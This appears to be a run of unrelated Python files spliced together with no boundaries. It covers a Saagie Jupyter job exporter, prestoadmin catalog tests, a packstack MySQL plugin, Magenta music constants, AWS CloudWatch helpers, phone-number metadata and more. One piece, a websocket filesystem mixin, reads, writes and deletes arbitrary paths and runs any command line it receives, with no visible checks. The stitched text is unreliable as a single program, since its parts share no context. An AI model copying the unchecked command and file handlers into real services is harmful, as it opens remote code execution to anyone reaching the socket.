@login_required
def capsule_type_chooser(method, notebook, data):
    """Let the user pick a capsule (job) type; only needs the username."""
    return {'username': SAAGIE_USERNAME}


def get_job_form(method, notebook, data):
    """Build the template context shared by the job create/update forms."""
    # Pre-fill the form with the current job's data, or an empty skeleton.
    if notebook.current_job is None:
        values = {'current': {'options': {}}}
    else:
        values = notebook.current_job.data
    return {'platforms': notebook.get_platforms(), 'values': values}


def create_job_base_data(data):
    """Map the submitted form fields to the Saagie job-creation payload."""
    current = {
        'cpu': data['cpu'],
        'disk': data['disk'],
        'memory': data['ram'],
        'isInternalSubDomain': False,
        'isInternalPort': False,
        'options': {},
    }
    return {
        'platform_id': data['saagie-platform'],
        'category': 'processing',
        'name': data['job-name'],
        'description': data['description'],
        'current': current,
    }


def upload_python_script(notebook, data):
    """Upload the selected notebook code cells as a .py file to Saagie.

    ``data['code-lines']`` is a '|'-separated list of code-cell indices.
    Returns the server-side file name from the upload response.

    BUG FIX: the original did ``map(int, data.get('code-lines', '').split('|'))``,
    which raised ValueError (int('')) whenever 'code-lines' was missing or
    empty; an absent selection now means "all code cells".
    """
    raw = data.get('code-lines', '')
    indices = [int(i) for i in raw.split('|') if i] if raw else None
    code = notebook.get_code(indices)
    files = {'file': (data['job-name'] + '.py', code)}
    return requests.post(
        SCRIPT_UPLOAD_URL_PATTERN % data['saagie-platform'],
        files=files, auth=SAAGIE_BASIC_AUTH_TOKEN).json()['fileName']


@views.add
@login_required
def python_job_form(method, notebook, data):
    """Create a new Python job from the notebook (POST) or show the form (GET)."""
    if method == 'POST':
        platform_id = data['saagie-platform']

        job_data = create_job_base_data(data)
        job_data['capsule_code'] = 'python'
        job_data['always_email'] = False
        job_data['manual'] = True
        job_data['retry'] = ''

        current = job_data['current']
        current['options']['language_version'] = data['language-version']
        current['releaseNote'] = data['release-note']
        current['template'] = data['shell-command']
        # Upload the selected cells first; the API returns the stored file name.
        current['file'] = upload_python_script(notebook, data)

        new_job_data = requests.post(JOBS_URL_PATTERN % platform_id,
                                    json=job_data, auth=SAAGIE_BASIC_AUTH_TOKEN).json()
        job = SaagieJob(notebook, new_job_data)
        job.set_as_current()
        return views.render('starting_job', notebook, {'job': job})

    context = get_job_form(method, notebook, data)
    context['action'] = '/saagie?view=python_job_form'
    context['username'] = SAAGIE_USERNAME
    return context


@views.add
@login_required
def update_python_job(method, notebook, data):
    """Upgrade the notebook's current job with new code (POST) or show the form."""
    if method == 'POST':
        job = notebook.current_job
        platform_id = job.platform_id
        # Reuse the creation payload builder; name/description come from the
        # existing job, not the form.
        data['saagie-platform'] = platform_id
        data['job-name'] = job.name
        data['description'] = ''
        current = create_job_base_data(data)['current']
        current['options']['language_version'] = data['language-version']
        current['releaseNote'] = data['release-note']
        current['template'] = data['shell-command']
        current['file'] = upload_python_script(notebook, data)

        requests.post(JOB_UPGRADE_URL_PATTERN % (platform_id, job.id),
                     json={'current': current}, auth=SAAGIE_BASIC_AUTH_TOKEN)
        # Drop the cached run so starting_job polls the new execution.
        job.last_run = None
        return views.render('starting_job', notebook, {'job': job})

    context = get_job_form(method, notebook, data)
    context['action'] = '/saagie?view=update_python_job'
    context['username'] = SAAGIE_USERNAME
    return context


@views.add
@login_required
def select_python_job(method, notebook, data):
    """Pick an existing job (POST, 'platform-job' id pair) or list them all."""
    if method == 'POST':
        platform_id, job_id = data['job'].split('-')
        notebook.current_job = SaagieJob.from_id(notebook, platform_id, job_id)
        return views.render('update_python_job', notebook, data)
    jobs_by_platform = []
    for platform in notebook.get_platforms():
        jobs = platform.get_jobs()
        if jobs:
            # Newest job (highest id) first.
            jobs_by_platform.append((platform,
                                     list(sorted(jobs, reverse=True))))
    return {'jobs_by_platform': jobs_by_platform,
            'action': '/saagie?view=select_python_job', 'username': SAAGIE_USERNAME}


@views.add
@login_required
def unsupported_kernel(method, notebook, data):
    """Shown when the notebook's kernel cannot be exported as a Saagie job."""
    return {'username': SAAGIE_USERNAME}


@views.add
@login_required
def starting_job(method, notebook, data):
    """Polling view shown while a job starts; switches once a run finished."""
    job = notebook.current_job
    job.fetch_logs()
    if job.is_started:
        return views.render('started_job', notebook, {'job': job})
    return {'job': job, 'username': SAAGIE_USERNAME}


@views.add
@login_required
def started_job(method, notebook, data):
    """Show the finished run (status and logs) of the current job."""
    return {'job': notebook.current_job, 'username': SAAGIE_USERNAME}

@views.add
def logout(method, notebook, data):
    """Forget the Saagie session: clear the token, root URL and username."""
    global SAAGIE_BASIC_AUTH_TOKEN, SAAGIE_ROOT_URL, SAAGIE_USERNAME
    SAAGIE_BASIC_AUTH_TOKEN = SAAGIE_ROOT_URL = SAAGIE_USERNAME = None
    return {}

def load_jupyter_server_extension(nb_app):
    """Entry point: register the /saagie and /saagie/check handlers."""
    web_app = nb_app.web_app
    base_url = web_app.settings['base_url']
    for suffix, handler in (('/saagie', SaagieHandler),
                            ('/saagie/check', SaagieCheckHandler)):
        route_pattern = url_path_join(base_url, suffix)
        web_app.add_handlers('.*$', [(route_pattern, handler)])

import numpy as np


class WordClusters(object):
    """Word-to-cluster lookup backed by two parallel numpy arrays."""

    def __init__(self, vocab, clusters):
        self.vocab = vocab
        self.clusters = clusters

    def ix(self, word):
        """Return the index of `word` in self.vocab/self.clusters.

        Raises KeyError when the word is not in the vocabulary.
        """
        matches = np.where(self.vocab == word)[0]
        if matches.size == 0:
            raise KeyError("Word not in vocabulary")
        return matches[0]

    def __getitem__(self, word):
        return self.get_cluster(word)

    def get_cluster(self, word):
        """Return the cluster number assigned to `word`."""
        return self.clusters[self.ix(word)]

    def get_words_on_cluster(self, cluster):
        """Return every vocabulary word assigned to `cluster`."""
        return self.vocab[self.clusters == cluster]

    @classmethod
    def from_text(cls, fname):
        """Build an instance from a two-column 'word cluster' text file."""
        vocab = np.genfromtxt(fname, dtype=str, delimiter=" ", usecols=0)
        clusters = np.genfromtxt(fname, dtype=int, delimiter=" ", usecols=1)
        return cls(vocab=vocab, clusters=clusters)

"""api_server URL Configuration

The `urlpatterns` list routes URLs to views. For more information please see:
    https://docs.djangoproject.com/en/1.10/topics/http/urls/
Examples:
Function views
    1. Add an import:  from my_app import views
    2. Add a URL to urlpatterns:  url(r'^$', views.home, name='home')
Class-based views
    1. Add an import:  from other_app.views import Home
    2. Add a URL to urlpatterns:  url(r'^$', Home.as_view(), name='home')
Including another URLconf
    1. Import the include() function: from django.conf.urls import url, include
    2. Add a URL to urlpatterns:  url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin

version = 'v1.0'

urlpatterns = [
    url(r'^admin/', admin.site.urls),
    # BUG FIX: the API pattern was unanchored (r'api/...'), so it matched
    # 'api/...' anywhere in the request path; anchor it like admin/ above.
    url(r'^api/%s/' % version, include('apis.urls'))
]

import os,json

from cgi import escape
def unescape(s):
    """Reverse cgi.escape for the three default HTML entities."""
    # &amp; must be handled last so that e.g. '&amp;lt;' yields '&lt;',
    # not '<'.
    for entity, char in (("&lt;", "<"), ("&gt;", ">"), ("&amp;", "&")):
        s = s.replace(entity, char)
    return s

class FilesystemMixin:
    """Websocket RPC handlers exposing basic filesystem operations.

    Methods use ``_`` in place of ``self``; handlers that produce output
    reply by sending a JSON message on ``_.ws``.
    """

    def h_fs_get(_,path,eltName=''):
        # Reply with either the HTML-escaped file contents or, for a
        # directory, a list of (name, is_dir) pairs.
        from stat import S_ISDIR
        data = (escape(open(path).read())
                if not S_ISDIR(os.stat(path).st_mode)
                else [(p,S_ISDIR(os.stat(path+'/'+p).st_mode))
                        for p in os.listdir(path)])
        _.ws.send(json.dumps({"method":"fs_get","result":[path,data,eltName]}))
        pass
    def h_fs_put(_,path,data):
        # Overwrite `path` with the unescaped chunks of `data`.
        f=open(path,'w')
        for x in data: f.write(unescape(x))
        f.close()
        pass
    def h_fs_system(_,path,eltName='',cwd=None):
        # Run `path` as a command line (no shell) and reply with the
        # (stdout, stderr) pair from communicate().
        # NOTE(review): communicate() returns bytes on Python 3, which
        # json.dumps cannot serialize — presumably Python 2 code; verify.
        import subprocess as sp
        import shlex
        data=sp.Popen(shlex.split(path),cwd=cwd,stdout=sp.PIPE, stderr=sp.PIPE).communicate()
        _.ws.send(json.dumps({"method":"fs_system","result":[path,data,eltName]}));
        pass
    # Thin one-line wrappers around the corresponding os primitives.
    def h_fs_mkdir (_,path): os.mkdir(path)
    def h_fs_rmdir (_,path): os.rmdir(path)
    def h_fs_touch (_,path): open(path,'w').close()
    def h_fs_unlink(_,path): os.unlink(path)
    pass
class FsApp(FilesystemMixin):
    """Minimal app object binding a websocket to the filesystem handlers."""

    def __init__(self, ws):
        self.ws = ws

# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""
tests for catalog module
"""
import os

import fabric.api
from fabric.operations import _AttributeString
from mock import patch

from prestoadmin import catalog
from prestoadmin.util import constants
from prestoadmin.util.exception import ConfigurationError, \
    ConfigFileNotFoundError
from prestoadmin.standalone.config import PRESTO_STANDALONE_USER_GROUP
from prestoadmin.util.local_config_util import get_catalog_directory
from tests.unit.base_unit_case import BaseUnitCase


class TestCatalog(BaseUnitCase):
    """Unit tests for prestoadmin.catalog: add/remove/deploy/validate/gather."""

    def setUp(self):
        # capture_output=True lets tests assert on captured stderr
        # (see test_warning_if_connector_dir_empty).
        super(TestCatalog, self).setUp(capture_output=True)

    @patch('prestoadmin.catalog.os.path.isfile')
    def test_add_not_exist(self, isfile_mock):
        # Adding a catalog whose .properties file is missing must fail.
        isfile_mock.return_value = False
        self.assertRaisesRegexp(ConfigurationError,
                                'Configuration for catalog dummy not found',
                                catalog.add, 'dummy')

    @patch('prestoadmin.catalog.validate')
    @patch('prestoadmin.catalog.deploy_files')
    @patch('prestoadmin.catalog.os.path.isfile')
    def test_add_exists(self, isfile_mock, deploy_mock, validate_mock):
        isfile_mock.return_value = True
        catalog.add('tpch')
        filenames = ['tpch.properties']
        deploy_mock.assert_called_with(filenames,
                                       get_catalog_directory(),
                                       constants.REMOTE_CATALOG_DIR,
                                       PRESTO_STANDALONE_USER_GROUP)
        validate_mock.assert_called_with(filenames)

    @patch('prestoadmin.catalog.deploy_files')
    @patch('prestoadmin.catalog.os.path.isdir')
    @patch('prestoadmin.catalog.os.listdir')
    @patch('prestoadmin.catalog.validate')
    def test_add_all(self, mock_validate, listdir_mock, isdir_mock,
                     deploy_mock):
        # add() with no argument deploys every catalog file in the directory.
        catalogs = ['tpch.properties', 'another.properties']
        listdir_mock.return_value = catalogs
        catalog.add()
        deploy_mock.assert_called_with(catalogs,
                                       get_catalog_directory(),
                                       constants.REMOTE_CATALOG_DIR,
                                       PRESTO_STANDALONE_USER_GROUP)

    @patch('prestoadmin.catalog.deploy_files')
    @patch('prestoadmin.catalog.os.path.isdir')
    def test_add_all_fails_if_dir_not_there(self, isdir_mock, deploy_mock):
        isdir_mock.return_value = False
        self.assertRaisesRegexp(ConfigFileNotFoundError,
                                r'Cannot add catalogs because directory .+'
                                r' does not exist',
                                catalog.add)
        self.assertFalse(deploy_mock.called)

    @patch('prestoadmin.catalog.sudo')
    @patch('prestoadmin.catalog.os.path.exists')
    @patch('prestoadmin.catalog.os.remove')
    def test_remove(self, local_rm_mock, exists_mock, sudo_mock):
        # remove() runs a guarded rm on the remote host and also deletes the
        # local copy of the .properties file.
        script = ('if [ -f /etc/presto/catalog/tpch.properties ] ; '
                  'then rm /etc/presto/catalog/tpch.properties ; '
                  'else echo "Could not remove catalog \'tpch\'. '
                  'No such file \'/etc/presto/catalog/tpch.properties\'"; fi')
        exists_mock.return_value = True
        fabric.api.env.host = 'localhost'
        catalog.remove('tpch')
        sudo_mock.assert_called_with(script)
        local_rm_mock.assert_called_with(get_catalog_directory() +
                                         '/tpch.properties')

    @patch('prestoadmin.catalog.sudo')
    @patch('prestoadmin.catalog.os.path.exists')
    def test_remove_failure(self, exists_mock, sudo_mock):
        # A failed remote command aborts with a per-host error message.
        exists_mock.return_value = False
        fabric.api.env.host = 'localhost'
        out = _AttributeString()
        out.succeeded = False
        sudo_mock.return_value = out
        self.assertRaisesRegexp(SystemExit,
                                '\\[localhost\\] Failed to remove catalog tpch.',
                                catalog.remove,
                                'tpch')

    @patch('prestoadmin.catalog.sudo')
    @patch('prestoadmin.catalog.os.path.exists')
    def test_remove_no_such_file(self, exists_mock, sudo_mock):
        # The remote script "succeeds" but reports the file was missing.
        exists_mock.return_value = False
        fabric.api.env.host = 'localhost'
        error_msg = ('Could not remove catalog tpch: No such file ' +
                     os.path.join(get_catalog_directory(), 'tpch.properties'))
        out = _AttributeString(error_msg)
        out.succeeded = True
        sudo_mock.return_value = out
        self.assertRaisesRegexp(SystemExit,
                                '\\[localhost\\] %s' % error_msg,
                                catalog.remove,
                                'tpch')

    @patch('prestoadmin.catalog.os.listdir')
    @patch('prestoadmin.catalog.os.path.isdir')
    def test_warning_if_connector_dir_empty(self, isdir_mock, listdir_mock):
        # An empty catalog directory only warns, it does not fail.
        isdir_mock.return_value = True
        listdir_mock.return_value = []
        catalog.add()
        self.assertEqual('\nWarning: Directory %s is empty. No catalogs will'
                         ' be deployed\n\n' % get_catalog_directory(),
                         self.test_stderr.getvalue())

    @patch('prestoadmin.catalog.os.listdir')
    @patch('prestoadmin.catalog.os.path.isdir')
    def test_add_permission_denied(self, isdir_mock, listdir_mock):
        isdir_mock.return_value = True
        error_msg = ('Permission denied')
        listdir_mock.side_effect = OSError(13, error_msg)
        fabric.api.env.host = 'localhost'
        self.assertRaisesRegexp(SystemExit, '\[localhost\] %s' % error_msg,
                                catalog.add)

    @patch('prestoadmin.catalog.os.remove')
    @patch('prestoadmin.catalog.remove_file')
    def test_remove_os_error(self, remove_file_mock, remove_mock):
        # Local OSErrors propagate unchanged.
        fabric.api.env.host = 'localhost'
        error = OSError(13, 'Permission denied')
        remove_mock.side_effect = error
        self.assertRaisesRegexp(OSError, 'Permission denied',
                                catalog.remove, 'tpch')

    @patch('prestoadmin.catalog.secure_create_directory')
    @patch('prestoadmin.util.fabricapi.put')
    def test_deploy_files(self, put_mock, create_dir_mock):
        # Each file is pushed with sudo and restrictive permissions.
        local_dir = '/my/local/dir'
        remote_dir = '/my/remote/dir'
        catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
                             PRESTO_STANDALONE_USER_GROUP)
        create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
        put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
                                 mode=0600)
        put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
                                 mode=0600)

    @patch('prestoadmin.catalog.os.path.isfile')
    @patch("__builtin__.open")
    def test_validate(self, open_mock, is_file_mock):
        # A properties file without connector.name is rejected.
        is_file_mock.return_value = True
        file_obj = open_mock.return_value.__enter__.return_value
        file_obj.read.return_value = 'connector.noname=example'

        self.assertRaisesRegexp(ConfigurationError,
                                'Catalog configuration example.properties '
                                'does not contain connector.name',
                                catalog.add, 'example')

    @patch('prestoadmin.catalog.os.path.isfile')
    def test_validate_fail(self, is_file_mock):
        # An unreadable properties file aborts with the underlying error.
        is_file_mock.return_value = True

        self.assertRaisesRegexp(
            SystemExit,
            'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
            'Underlying exception:\n    No such file or directory',
            catalog.add, 'example')

    @patch('prestoadmin.catalog.get')
    @patch('prestoadmin.catalog.files.exists')
    @patch('prestoadmin.catalog.ensure_directory_exists')
    @patch('prestoadmin.catalog.os.path.exists')
    def test_gather_connectors(self, path_exists, ensure_dir_exists,
                               files_exists, get_mock):
        fabric.api.env.host = 'any_host'
        path_exists.return_value = False
        files_exists.return_value = True
        catalog.gather_catalogs('local_config_dir')
        get_mock.assert_called_once_with(
            constants.REMOTE_CATALOG_DIR, 'local_config_dir/any_host/catalog', use_sudo=True)

        # if remote catalog dir does not exist
        get_mock.reset_mock()
        files_exists.return_value = False
        results = catalog.gather_catalogs('local_config_dir')
        self.assertEqual([], results)
        self.assertFalse(get_mock.called)

"""
Installs and configures MySQL
"""

import uuid
import logging

from packstack.installer import validators
from packstack.installer import utils

from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile

# Controller object will be initialized from main flow
controller = None

# Plugin name
PLUGIN_NAME = "OS-MySQL"
PLUGIN_NAME_COLORED = utils.color_text(PLUGIN_NAME, 'blue')

logging.debug("plugin %s loaded", __name__)

def initConfig(controllerObject):
    """Register the MySQL parameter group (host, user, password) with the
    global installer controller."""
    global controller
    controller = controllerObject
    logging.debug("Adding MySQL OpenStack configuration")
    paramsList = [
                  {"CMD_OPTION"      : "mysql-host",
                   "USAGE"           : "The IP address of the server on which to install MySQL",
                   "PROMPT"          : "Enter the IP address of the MySQL server",
                   "OPTION_LIST"     : [],
                   "VALIDATORS"      : [validators.validate_ssh],
                   "DEFAULT_VALUE"   : utils.get_localhost_ip(),
                   "MASK_INPUT"      : False,
                   "LOOSE_VALIDATION": True,
                   "CONF_NAME"       : "CONFIG_MYSQL_HOST",
                   "USE_DEFAULT"     : False,
                   "NEED_CONFIRM"    : False,
                   "CONDITION"       : False },
                  {"CMD_OPTION"      : "mysql-user",
                   "USAGE"           : "Username for the MySQL admin user",
                   "PROMPT"          : "Enter the username for the MySQL admin user",
                   "OPTION_LIST"     : [],
                   "VALIDATORS"      : [validators.validate_not_empty],
                   "DEFAULT_VALUE"   : "root",
                   "MASK_INPUT"      : False,
                   "LOOSE_VALIDATION": False,
                   "CONF_NAME"       : "CONFIG_MYSQL_USER",
                   "USE_DEFAULT"     : True,
                   "NEED_CONFIRM"    : False,
                   "CONDITION"       : False },
                  {"CMD_OPTION"      : "mysql-pw",
                   "USAGE"           : "Password for the MySQL admin user",
                   "PROMPT"          : "Enter the password for the MySQL admin user",
                   "OPTION_LIST"     : [],
                   "VALIDATORS"      : [validators.validate_not_empty],
                   # Default to a random 16-hex-char password.
                   "DEFAULT_VALUE"   : uuid.uuid4().hex[:16],
                   "MASK_INPUT"      : True,
                   "LOOSE_VALIDATION": True,
                   "CONF_NAME"       : "CONFIG_MYSQL_PW",
                   "USE_DEFAULT"     : False,
                   "NEED_CONFIRM"    : True,
                   "CONDITION"       : False },
                 ]

    groupDict = { "GROUP_NAME"            : "MYSQL",
                  "DESCRIPTION"           : "MySQL Config parameters",
                  "PRE_CONDITION"         : lambda x: 'yes',
                  "PRE_CONDITION_MATCH"   : "yes",
                  "POST_CONDITION"        : False,
                  "POST_CONDITION_MATCH"  : True}

    controller.addGroup(groupDict, paramsList)


def initSequences(controller):
    """Register the MySQL installation sequence with the controller."""
    steps = [
        {'title': 'Adding MySQL manifest entries',
         'functions': [createmanifest]},
    ]
    controller.addSequence("Installing MySQL", [], [], steps)


def createmanifest(config):
    """Build the per-host mysql Puppet manifest and firewall rules."""
    if config['CONFIG_MYSQL_INSTALL'] == 'y':
        install = True
        suffix = 'install'
    else:
        install = False
        suffix = 'noinstall'

    # In case we are not installing MySQL server, mysql* manifests have
    # to be run from Keystone host
    host = install and config['CONFIG_MYSQL_HOST'] \
                    or config['CONFIG_KEYSTONE_HOST']
    manifestfile = "%s_mysql.pp" % host
    manifestdata = [getManifestTemplate('mysql_%s.pp' % suffix)]

    def append_for(module, suffix):
        # Modules have to be appended to the existing mysql.pp
        # otherwise pp will fail for some of them saying that
        # Mysql::Config definition is missing.
        template = "mysql_%s_%s.pp" % (module, suffix)
        manifestdata.append(getManifestTemplate(template))

    append_for("keystone", suffix)
    hosts = set()
    for mod in ['nova', 'cinder', 'glance', 'neutron', 'heat']:
        if config['CONFIG_%s_INSTALL' % mod.upper()] == 'y':
            append_for(mod, suffix)
            # Check wich modules are enabled so we can allow their
            # hosts on the firewall
            if mod != 'nova' and mod != 'neutron':
                hosts.add(config.get('CONFIG_%s_HOST' % mod.upper()).strip())
            elif mod == 'neutron':
                hosts.add(config.get('CONFIG_NEUTRON_SERVER_HOST').strip())
            elif config['CONFIG_NOVA_INSTALL'] != 'n':
                # In the remote case that we have lots of nova hosts
                hosts.add(config.get('CONFIG_NOVA_API_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_CERT_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_VNCPROXY_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_CONDUCTOR_HOST').strip())
                hosts.add(config.get('CONFIG_NOVA_SCHED_HOST').strip())
                if config['CONFIG_NEUTRON_INSTALL'] != 'y':
                    # NOTE(review): split_hosts is not imported in this
                    # module's visible imports — verify it is provided
                    # elsewhere, otherwise this branch raises NameError.
                    dbhosts = split_hosts(config['CONFIG_NOVA_NETWORK_HOSTS'])
                    hosts |= dbhosts
                for host in config.get('CONFIG_NOVA_COMPUTE_HOSTS').split(','):
                    hosts.add(host.strip())

    # Open the MySQL port to every enabled service host.
    config['FIREWALL_ALLOWED'] = ",".join(["'%s'" % i for i in hosts])
    config['FIREWALL_SERVICE_NAME'] = "mysql"
    config['FIREWALL_PORTS'] = "'3306'"
    manifestdata.append(getManifestTemplate("firewall.pp"))

    appendManifestFile(manifestfile, "\n".join(manifestdata), 'pre')

def power_digit_sum(exponent, base=2):
    """Return the sum of the decimal digits of ``base ** exponent``.

    Args:
        exponent: Non-negative integer exponent.
        base: Integer base to exponentiate. Defaults to 2, preserving the
            original behavior (Project Euler #16 style sums).

    Returns:
        int: Sum of the base-10 digits of ``base ** exponent``.
    """
    # Generator expression instead of a throwaway list inside sum().
    return sum(int(digit) for digit in str(base ** exponent))
# Copyright 2022 The Magenta Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

"""Constants for music processing in Magenta."""

# Meter-related constants.
DEFAULT_QUARTERS_PER_MINUTE = 120.0
DEFAULT_STEPS_PER_BAR = 16  # 4/4 music sampled at 4 steps per quarter note.
DEFAULT_STEPS_PER_QUARTER = 4

# Default absolute quantization.
DEFAULT_STEPS_PER_SECOND = 100

# Standard pulses per quarter.
# https://en.wikipedia.org/wiki/Pulses_per_quarter_note
STANDARD_PPQ = 220

# Special melody events.
NUM_SPECIAL_MELODY_EVENTS = 2
MELODY_NOTE_OFF = -1
MELODY_NO_EVENT = -2

# Other melody-related constants.
MIN_MELODY_EVENT = -2
MAX_MELODY_EVENT = 127
MIN_MIDI_PITCH = 0  # Inclusive.
MAX_MIDI_PITCH = 127  # Inclusive.
NUM_MIDI_PITCHES = MAX_MIDI_PITCH - MIN_MIDI_PITCH + 1
NOTES_PER_OCTAVE = 12

# Velocity-related constants.
MIN_MIDI_VELOCITY = 1  # Inclusive.
MAX_MIDI_VELOCITY = 127  # Inclusive.

# Program-related constants.
MIN_MIDI_PROGRAM = 0
MAX_MIDI_PROGRAM = 127

# MIDI programs that typically sound unpitched.
UNPITCHED_PROGRAMS = (
    list(range(96, 104)) + list(range(112, 120)) + list(range(120, 128)))

# Chord symbol for "no chord".
NO_CHORD = 'N.C.'

# The indices of the pitch classes in a major scale.
MAJOR_SCALE = [0, 2, 4, 5, 7, 9, 11]

# NOTE_KEYS[note] = The major keys that note belongs to.
# ex. NOTE_KEYS[0] lists all the major keys that contain the note C,
# which are:
# [0, 1, 3, 5, 7, 8, 10]
# [C, C#, D#, F, G, G#, A#]
#
# 0 = C
# 1 = C#
# 2 = D
# 3 = D#
# 4 = E
# 5 = F
# 6 = F#
# 7 = G
# 8 = G#
# 9 = A
# 10 = A#
# 11 = B
#
# NOTE_KEYS can be generated using the code below, but is explicitly declared
# for readability:
# NOTE_KEYS = [[j for j in range(12) if (i - j) % 12 in MAJOR_SCALE]
#              for i in range(12)]
NOTE_KEYS = [
    [0, 1, 3, 5, 7, 8, 10],
    [1, 2, 4, 6, 8, 9, 11],
    [0, 2, 3, 5, 7, 9, 10],
    [1, 3, 4, 6, 8, 10, 11],
    [0, 2, 4, 5, 7, 9, 11],
    [0, 1, 3, 5, 6, 8, 10],
    [1, 2, 4, 6, 7, 9, 11],
    [0, 2, 3, 5, 7, 8, 10],
    [1, 3, 4, 6, 8, 9, 11],
    [0, 2, 4, 5, 7, 9, 10],
    [1, 3, 5, 6, 8, 10, 11],
    [0, 2, 4, 6, 7, 9, 11]
]

# Copyright 2018 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module containing classes related to AWS CloudWatch Logs."""

import json

from perfkitbenchmarker import resource
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import util


class LogGroup(resource.BaseResource):
  """Represents an AWS CloudWatch Logs log group.

  Attributes:
    region: str. AWS region in which the group is created.
    name: str. Name of the log group.
    retention_in_days: int. Retention policy applied after creation.
  """

  def __init__(self, region, name, retention_in_days=7):
    super(LogGroup, self).__init__()
    self.region = region
    self.name = name
    self.retention_in_days = retention_in_days

  def _Create(self):
    """Create the log group."""
    vm_util.IssueCommand(util.AWS_PREFIX + [
        '--region', self.region,
        'logs', 'create-log-group',
        '--log-group-name', self.name,
    ])

  def _Delete(self):
    """Delete the log group; failures (e.g. already gone) are tolerated."""
    vm_util.IssueCommand(
        util.AWS_PREFIX + [
            '--region', self.region,
            'logs', 'delete-log-group',
            '--log-group-name', self.name,
        ],
        raise_on_failure=False)

  def Exists(self):
    """Returns True if the log group exists."""
    cmd = util.AWS_PREFIX + [
        '--region', self.region,
        'logs', 'describe-log-groups',
        '--log-group-name-prefix', self.name,
        '--no-paginate'
    ]
    out, _, _ = vm_util.IssueCommand(cmd)
    # describe-log-groups matches by prefix, so require an exact name match.
    matches = [g for g in json.loads(out)['logGroups']
               if g['logGroupName'] == self.name]
    return bool(matches)

  def _PostCreate(self):
    """Set the retention policy."""
    vm_util.IssueCommand(util.AWS_PREFIX + [
        '--region', self.region,
        'logs', 'put-retention-policy',
        '--log-group-name', self.name,
        '--retention-in-days', str(self.retention_in_days),
    ])


def GetLogs(region, stream_name, group_name, token=None):
  """Fetch one page of events from a CloudWatch log stream.

  Runs ``aws logs get-log-events`` from the head of the stream, resuming
  from ``token`` when one is given, and returns the parsed JSON response.
  """
  cmd = util.AWS_PREFIX + [
      '--region', region,
      'logs', 'get-log-events',
      '--start-from-head',
      '--log-group-name', group_name,
      '--log-stream-name', stream_name,
  ]
  if token:
    cmd += ['--next-token', token]
  out, _, _ = vm_util.IssueCommand(cmd)
  return json.loads(out)


def GetLogStreamAsString(region, stream_name, log_group):
  """Return all messages of the log stream joined by newlines.

  Pages through GetLogs, following ``nextForwardToken``, until a page
  comes back with no events.
  """
  messages = []
  next_token = None
  batch = []
  while next_token is None or batch:
    page = GetLogs(region, stream_name, log_group, next_token)
    batch = page['events']
    next_token = page['nextForwardToken']
    messages.extend(event['message'] for event in batch)
  return '\n'.join(messages)

"""Auto-generated file, do not edit by hand. BM metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata

PHONE_METADATA_BM = PhoneMetadata(id='BM', country_code=1, international_prefix='011',
    general_desc=PhoneNumberDesc(national_number_pattern='(?:441|[58]\\d\\d|900)\\d{7}', possible_length=(10,), possible_length_local_only=(7,)),
    fixed_line=PhoneNumberDesc(national_number_pattern='441(?:[46]\\d\\d|5(?:4\\d|60|89))\\d{4}', example_number='4414123456', possible_length=(10,), possible_length_local_only=(7,)),
    mobile=PhoneNumberDesc(national_number_pattern='441(?:[2378]\\d|5[0-39])\\d{5}', example_number='4413701234', possible_length=(10,), possible_length_local_only=(7,)),
    toll_free=PhoneNumberDesc(national_number_pattern='8(?:00|33|44|55|66|77|88)[2-9]\\d{6}', example_number='8002123456', possible_length=(10,)),
    premium_rate=PhoneNumberDesc(national_number_pattern='900[2-9]\\d{6}', example_number='9002123456', possible_length=(10,)),
    personal_number=PhoneNumberDesc(national_number_pattern='52(?:3(?:[2-46-9][02-9]\\d|5(?:[02-46-9]\\d|5[0-46-9]))|4(?:[2-478][02-9]\\d|5(?:[034]\\d|2[024-9]|5[0-46-9])|6(?:0[1-9]|[2-9]\\d)|9(?:[05-9]\\d|2[0-5]|49)))\\d{4}|52[34][2-9]1[02-9]\\d{4}|5(?:00|2[12]|33|44|66|77|88)[2-9]\\d{6}', example_number='5002345678', possible_length=(10,)),
    national_prefix='1',
    national_prefix_for_parsing='1|([2-8]\\d{6})$',
    national_prefix_transform_rule='441\\1',
    leading_digits='441',
    mobile_number_portable_region=True)

# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
